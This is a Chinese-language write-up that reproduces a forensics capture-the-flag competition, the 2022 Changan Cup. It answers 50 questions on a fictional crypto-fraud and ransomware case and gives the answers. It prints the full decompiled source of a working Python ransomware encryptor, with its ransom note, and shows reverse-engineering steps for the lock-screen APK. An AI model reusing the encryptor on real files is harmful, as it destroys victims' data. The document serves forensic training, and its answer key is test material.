2022长安杯复现

案件情况

某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗，该网站号称使用“USTD 币”购买所谓的“HT 币”，受害人充 值后不但“HT 币”无法提现、交易，而且手机还被恶意软件锁定 勒索。警方根据受害人提供的虚拟币交易网站调取了对应的服 务器镜像并对案件展开侦查。

检材1

    1、检材1的SHA256值为：

火眼打开之后计算出希哈值：9E48BB2CAE5C1D93BAF572E3646D2ECD26080B70413DC7DC4131F88289F49E34

    2、 分析检材1，搭建该服务器的技术员IP地址是多少？用该地址解压检材2【172.16.80.100】

仿真出来last命令

172.16.80.100

    3、 检材1中，操作系统发行版本号为

Cntos Linux release 7.5.1804 (Core)

cat /etc/redhat-release

    4、 检材1系统中，网卡绑定的静态IP地址为

172.16.80.133

ifconfig命令查看即可

    5、检材1中，网站jar包所存放的目录是 （答案为绝对路径，如“/home/honglian/”)

/web/app 

查看历史命令，发现多次进入/web/app目录，并执行npm等指令，进入后发现有多个jar包，确定为网站jar包所存放目录 

 

    6、检材1中，监听7000端口的进程对应文件名为

cloud.jar

导出所有jar包放入Java反编译工具（此时遇到打不开的情况，可以重新去检验镜像哈希，应该是镜像损坏，导致导出的jar包损坏）

    7、检材1中，网站管理后台页面对应的网络端口为【9090】

在检材二的charm浏览器的历史记录中

 

    8、 检材1中，网站前台页面里给出的APK的下载地址是

网站启动起来
3000端口出现app下载，扫描二维码
可以知道网址是https://pan.forensix.cn/f/c45ca511c7f2469090ad/?dl=1

    9. 检材1中，网站管理后台页面调用的用户表(admin)里的密码字段加密方式为?

导出admin所在jar包，搜索password：可以发现密码和验证码的加密方式都为MD5

 

10. 分析检材1，网站管理后台登录密码加密算法中所使用的盐值是

XehGyeyrVgOV4P8Uf70REVpIw3iVNwNs

定位md5Key 

最后发现MD5.key即为加密算法的盐值 

 

 

检材2

11. 检材2中，windows账户Web King的登录密码是

135790

通过分析软件，可以看到密码

12. 检材2中，除检材1以外，还远程连接过哪个IP地址？并用该地址解压检材3

172.16.80.128 

查看xshell的连接记录，可以发现

已知检材1的IP是：172.16.80.133

所以在分析结果中排除172.16.80.133，另一个IP即是答案

13. 检材2中，powershell中输入的最后一条命令是

ipconfig 

powershell命令的默认存储目录\Users\[user]\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt，在该路径下也可以找到

14. 检材2中，下载的涉案网站源代码文件名为

ZTuoExchange_framework-master.zip 

谷歌浏览器里有相应的zip下载记录，导出文件

15. 检材2中，网站管理后台root账号的密码为

root

在谷歌浏览器保存了账号和密码

 

16. 检材2中，技术员使用的WSL子系统发行版本是（答案格式如下：windows 10.1）

Ubuntu 20.04 

仿真过后通过命令wsl -l可以获取到

或者通过分析程序发现，命令都是在20.04中输入的

17. 检材2中，运行的数据库服务版本号是（答案格式如下：10.1）

 8.0.30

通过分析程序查看，可以看到版本号

18. 上述数据库debian-sys-maint用户的初始密码是

mysql的debian-sys-maint的初始密码保存在mysql目录的配置文件debian.cnf中

数据库是在wsl子系统中运行的，因此需要定位到子系统目录C:\Users\Web King\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu20.04LTS_79rhkp1fndgsc\LocalState\rootfs

19. 检材3服务器root账号的密码是

h123456 
系统SSH历史输入命令中，发现曾使用sshpass对172.16.80.128进行连接，连接密码为h123456

 

检材三

根据网站前端和技术员个人电脑上的线索，发现了网站后端所在的服务器IP并再次调证取得“检材3”，分析所有掌握的检材回答下列问题

通过第12题答案，解压检材3

20. 检材3中，监听33050端口的程序名（program name)为

docker-proxy

在历史命令中发现嫌疑人进入了/data/mysql 之后使用了docker-compose up

进入目录后，查看docker-compose.yml配置文件，发现使用了33050，尝试启动后发现program name

 

netstat -tunlp

 

21. 除MySQL外，该网站还依赖以下哪种数据库

在对admin-api.jar的逆向分析中，发现使用了redis以及mongodb

 

22. 检材3中，MySQL数据库root账号的密码是

admin-api.jar中也可分析出密码

 

23. 检材3中，MySQL数据库在容器内部的数据目录为

 

通过进入容器内部找到相关信息

docker exec -it 8eda4cb0b452 bash

24. 涉案网站调用的MySQL数据库名为、

b1

25. 勒索者在数据库中修改了多少个用户的手机号？

在 docker 中的 /var/lib/mysql 目录下，根据 docker-compose 的配置映射到宿主机上就在 /data/mysql/db 目录下,8eda4cb0b452.log可以导出来查看，比较方便,问修改的数量，过滤 update 关键字，在日志中有 8 处匹配，但实际上有关 mobile_phone 的日志只有 3 条

2022-10-18T08:48:06.120268Z	    8 Query	update admin set last_login_time='2022-10-18 04:48:06.114', last_login_ip=null where id=1
2022-10-18T08:48:21.016425Z	    8 Query	update admin set last_login_time='2022-10-18 04:48:21.023', last_login_ip='172.16.80.100' where id=1
2022-10-18T09:38:56.117223Z	    9 Query	update admin set last_login_time='2022-10-18 05:38:56.113', last_login_ip='172.16.80.197' where id=1
2022-10-19T03:20:39.001499Z	   13 Query	UPDATE `b1`.`member` SET `mobile_phone` = '13638991111' WHERE `id` = 9
2022-10-19T03:20:41.851525Z	   13 Query	UPDATE `b1`.`member` SET `mobile_phone` = '13282992222' WHERE `id` = 10
2022-10-19T03:20:44.184953Z	   13 Query	UPDATE `b1`.`member` SET `mobile_phone` = '13636993333' WHERE `id` = 11
2022-10-19T05:34:00.075764Z	   10 Query	select count(a.id) from member a , member_application b where a.id = b.member_id and b.audit_status = 2 and date_format(b.update_time,'%Y-%m-%d') = '2022-10-18'
2022-10-20T03:18:25.478485Z	   10 Query	update admin set last_login_time='2022-10-19 23:18:25.461', last_login_ip='172.16.80.100' where id=1

26. 勒索者在数据库中删除的用户数量为

28

在log文件中可以搜索到有批量删除的记录，delete from b1 member··，记数一下有28个

 

27. 还原被破坏的数据库，分析除技术员以外，还有哪个IP地址登录过管理后台网站？用该地址解压 检材4

172.16.80.197

用数据库分析工具来分析一下，172.16.80.197登录了管理后台的网址

 

28. 还原全部被删改数据，用户id为500的注册会员的HT币钱包地址为

cee631121c2ec9232f3a2f028ad5c89b 

在member_wallet表中，找到ID=500的用户，得到

 

29. 还原全部被删改数据，共有多少名用户的会员等级为’LV3’

将member数据库导出成csv结构，筛选出member_grade_id=3，有158条。但我们还要还原数据，实际上 member 表中还有 28 条被删除的用户记录，28 个用户中有6个 LV3，共164个

“SELECT count(member_grade_id) FROM member WHERE member_grade_id=3”

 

30. 还原全部被删改数据，哪些用户ID没有充值记录

318，989

SELECT id  from member where id not in (select member_id from member_transaction)

 

 

31. 还原全部被删改数据，2022年10月17日总计产生多少笔交易记录？

1000

select count(*) from member_transaction where create_time BETWEEN "2022-10-17 00:00:00" and "2022-10-17 23:59:59"

 

 

32. 还原全部被删改数据，该网站中充值的USDT总额为

408228 

select sum(amount) from member_transaction

 

 

检材四

根据前期侦查分析，通过技术手段找到了幕后老板，并对其使用的安卓模拟器“检材4”进行了固定。分析所有掌握的检材，回答下列问题

修改文件为zip，然后打开发现vmdk文件，导入火眼中分析

33. 嫌疑人使用的安卓模拟器软件名称是

夜神模拟器

 

34. 检材4中，“老板”的阿里云账号是

forensixtech1

 

35.检材4中安装的VPN工具的软件名称是

v2Ray

配置信息里面就有

 

 

36. 上述VPN工具中记录的节点IP是

38.68.135.18

 

 

37. 检材4中，录屏软件安装时间为

2022-10-19 10:50:27

通过apk的位置找到软件的包名

回到火眼

 

38. 上述录屏软件中名为“s_20221019105129”的录像，在模拟器存储中对应的原始文件名为

0c2f5dd4a9bc6f34873fb3c0ee9b762b98e8c46626410be7191b11710117a12d

 在目录/storage/emulated/0/Android/data/com.jiadi.luping/files 下找到录屏文件

 

39. 上述录屏软件登录的手机号是

18645091802

通过导出record.db还有record.db-wal文件，导入DB Brower中分析得到

 

40. 检材4中，发送勒索邮件的邮箱地址为

skterran@163.com 

火眼直接分析得到

 

EXE分析

分析所有掌握的检材，找到勒索邮件中被加密的文档和对应的加/解密程序，并回答下列问题

41.分析加密程序，编译该加密程序使用的语言是

python

 

42. 分析加密程序，它会加密哪些扩展名的文件？

txt.jpg.docx.xls

参考文章：pyinstaller打包成exe的反向解析工具(pyinstxtractor.py和uncompyle6) - 简书

 

python pyinstxtractor.py encrypt_file.exe

 在解析生成的encrypt_file.exe_extracted目录中的PYZ-00.pyz_extracted目录

找一个.pyc文件复制前12字节16进制到encrypt_file_1前面

 用uncompyle6进行反编译

uncompyle6 .\encrypt_file_1.pyc >123.py

反编译成功

# uncompyle6 version 3.8.0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.7.4 (tags/v3.7.4:e09359112e, Jul  8 2019, 20:34:20) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: encrypt_file_1.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import time
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import os
pubkey = '-----BEGIN PUBLIC KEY-----\n（有风险提示所以删除只留下后5位）u+w==\n-----END PUBLIC KEY-----\n'
msg = "SOMETHING WENT WRONG,PLEASE CONTACT YOUR SYSTEM ADMINISTRATOR!\nHe can help you to understand whats happened.\nIf he can't help you,contact us via email:\naa1028@forensix.cn\nale@forensix.cn\nHURRY UP!WE HAVE ANTIDOTE FOR YOUR FILES!DISCOUNT 20%FOR CLIENTS,WHO CONTACT US IN THE SAME DAY!\nYou can attach 2 files (text or picture)to check our honest intentions,we will heal them and send\nback.\nPlease pay 0.618 ETH\nThe wallet address：0xef9edf6cdacb7d925aee0f9bd607b544c5758850\n************************************\n"class XORCBC:def __init__(self, key: bytes):self.key = bytearray(key)self.cur = 0def encrypt(self, data: bytes) -> bytes:data = bytearray(data)for i in range(len(data)):tmp = data[i]data[i] ^= self.key[self.cur]self.key[self.cur] = tmpself.cur = (self.cur + 1) % len(self.key)return bytes(data)print('加密程序V1.0')
print('文件正在加密中~~~~~~~~~~~~~~~~~~\n')def run_finall():for filepath, dirnames, filenames in os.walk(os.getcwd()):for filename in filenames:if filename != 'encrypt_file.py' and filename != 'decrypt_file.py' and '_encrypted' not in filename:ExtensionPath = os.path.splitext(filename)[(-1)]if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:time.sleep(3)data_file = os.path.join(filepath, filename)rsakey = RSA.import_key(pubkey)cipher = Cipher_pkcs1_v1_5.new(rsakey)xor_key = os.urandom(16)xor_obj = XORCBC(xor_key)outf = open(data_file + '_encrypted', 'wb')encrypted_xor_key = cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size = 4096with open(data_file, 'rb') as (f):while True:data = f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))outf.close()os.remove(data_file)run_finall()def redme():try:dir = os.path.join(os.path.expanduser('~'), 'Desktop')print(dir)with open(dir + '/!READ_ME.txt', 'w') as (ff):ff.write(msg)except:dir1 = os.getcwd()print(dir1)with open(dir1 + '/!READ_ME.txt', 'w') as (ff):ff.write(msg)print('\n加密完成~~~~~~~~~~~~~~~~~~')
os.system('pause')
# okay decompiling .\encrypt_file_1.pyc

“if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:”-----------------是对txt.jpg.docx.xls的文件进行加密 

43. 分析加密程序，是通过什么算法对文件进行加密的？

data_file = os.path.join(filepath, filename)rsakey = RSA.import_key(pubkey)cipher = Cipher_pkcs1_v1_5.new(rsakey)xor_key = os.urandom(16)xor_obj = XORCBC(xor_key)outf = open(data_file + '_encrypted', 'wb')encrypted_xor_key = cipher.encrypt(xor_key)outf.write(encrypted_xor_key)buffer_size = 4096with open(data_file, 'rb') as (f):while True:data = f.read(buffer_size)if not data:breakoutf.write(xor_obj.encrypt(data))outf.close()os.remove(data_file)

首先把公钥导入，生成一个rsakey，然后把rsakey通过cipher加密生成了一个cipher字符串随后通过cipher加密了xor_key，xor_key是一个随机的16位字符串（os.urandom(16)），因此是outf.write(encrypted_xor_key)加密了文件

异或加密

class XORCBC:def __init__(self, key: bytes):self.key = bytearray(key)self.cur = 0def encrypt(self, data: bytes) -> bytes:data = bytearray(data)for i in range(len(data)):tmp = data[i]data[i] ^= self.key[self.cur]self.key[self.cur] = tmpself.cur = (self.cur + 1) % len(self.key)return bytes(data)

44. 分析加密程序，其使用的非对称加密方式公钥后5位为？

根据解密后的内容得到公钥

pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'

可以得到u+w==

45. 被加密文档中，FLAG1的值是

TREFWGFS

通过相同的方法，对decrypt_file.exe进行逆向

随后得到的密码为：4008003721

使用该密码解密

apk分析

46. 恶意APK程序的包名为

cn.forensix.changancup

通过第8题得到的链接下载apk并分析，jadx打开看到包名

47. APK调用的权限包括

READ_EXTERNAL_STORAGE|WRITE_EXTERNAL_STORAGE

继续查看AndroidManifest.xml，得到权限

48. 解锁第一关所使用的FLAG2值为（FLAG为8位字符串，如需在apk中输入FLAG，请输入完整内容，如输入"FLAG9:QWERT123"）

MATSFRKG 

利用雷电进行一键脱壳

脱壳后反编译jadx

直接搜索FLAG2，可以看到结果

49. 解锁第二关所使用的FLAG3值为(FLAG为8位字符串，如需在apk中输入FLAG，请输入完整内容，如输入"FLAG9:QWERT123")

找到了mainactivity，分析flag2周围的函数

找到加密的地方

} else if (App.OooO0O0.OooO0oo.equals(this.OooO0o0.getText().toString()) && App.OooO0OO.edit().putInt("unlocked", App.OooO0OO.getInt("unlocked", 0) | 2).commit()) {StringBuilder OooO0OO2 = C0261o0000Oo.OooO0OO(App.OooO0OO.getString("flag16_tkey", ""));OooO0OO2.append(App.OooO0O0.OooO0oo);if (App.OooO0OO.edit().putString("flag16_tkey", OooO0OO2.toString()).commit()) {App.OooO0Oo();System.out.println("delay lock screen close");OooO00o();}

this.OooO0oo = new String(decrypt(OooO0O0.OooO0O0("ffd4d7459ad24cd035611b014a2cccac")));

分析可得进行了两次加密

decrypt函数：

public native byte[] decrypt(byte[] bArr);public native byte[] encrypt(byte[] bArr);public native void init(byte[] bArr);

init函数调用了libcipher.so对密文进行了解密，与输入的值进行比较，最终判断是否正确 

package com.example.hanshu;
import android.app.Application;
import android.util.Log;public class App extends Application {static {System.loadLibrary("cipher");}public native byte[] decrypt(byte[] bArr);public native byte[] encrypt(byte[] bArr);public native void init(byte[] bArr);public static  void  main(){String out = new String(new App().decrypt(OooO0O0("ffd4d7459ad24cd035611b014a2cccac")));System.out.println("ocipher:"+out);}public static byte[] OooO0O0(String str){int length = str.length() / 2;byte[] bArr = new byte[length];for (int i =0; i < length; i++){int i2 = i +2;bArr[i] = (byte) Integer.parseInt(str.substring(i2, i2+2),  16);}return bArr;}}

 最后连接模拟器，将此apk推送到模拟器中，查看日志，即可找到FLAG3

FLAG3:TDQ2UWP9

50. 解锁第三关所需的KEY值由ASCII可显示字符组成，请请分析获取该KEY值

限制输入24个字符串，然后分成四位一组分成六组数，

密码由全部可显示的ASCII码组成，在标准的ASCII表中，可打印的字符的编码范围是33-126，在代码中是对分为6组的数组依次判断，也就是说我们可以通过每4位爆破的方式，组成全部的密码

public class Test{static int[] OooO0oO = {1197727163, 1106668241, 312918615, 1828680913, 1668105995, 1728985987};public static long[] OooO(long j, long j2) {if (j == 0) {return new long[]{0, 1};}long[] OooO = OooO(j2 % j, j);return new long[]{((j2 / j) * OooO[0]) + OooO[1], OooO[0]};}public static void main(String[] args) {String res = "";for (int i = 0; i < 6; i++) {//4层循环遍历4位字符串for (int a1 = 33; a1 < 127; a1++) {for (int a2 = 33; a2 < 127; a2++) {for (int a3 = 33; a3 < 127; a3++) {for (int a4 = 33; a4 < 127; a4++) {long tmp = (long) (a1 << 16);tmp = tmp | ((long) (a2 << '\b'));tmp = tmp | ((long) (a3 << 24));tmp = ((long) a4) | tmp;if (((OooO(tmp, 0x100000000L)[0] % 0x100000000L) + 0x100000000L) % 0x100000000L == ((long) OooO0oO[i])) {res += (char)a1;res += (char)a2;res += (char)a3;res += (char)a4;//获取到当前密码后，跳出4层循环a1 = a2 = a3 = a4 = 128;}}}}}}System.out.println(res);}
}

运行结果

a_asd./1imc2)dd1234]_+=+